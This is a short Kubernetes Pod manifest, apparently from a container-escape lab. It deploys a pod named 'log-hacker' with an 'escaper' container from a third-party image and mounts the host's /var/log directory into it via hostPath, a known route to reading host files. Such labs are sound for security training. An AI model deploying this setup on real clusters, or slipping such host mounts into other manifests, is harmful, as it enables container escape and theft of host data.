apiVersion: v1
kind: Pod
metadata:
  name: log-hacker
  namespace: mount-log
spec:
  serviceAccountName: logger
  containers:
  - name: escaper
    image: shadowstar884/loghacker
    volumeMounts:
    - name: logs
      mountPath: /var/log/host
  volumes:
  - name: logs
    hostPath:
      path: /var/log/
      type: Directory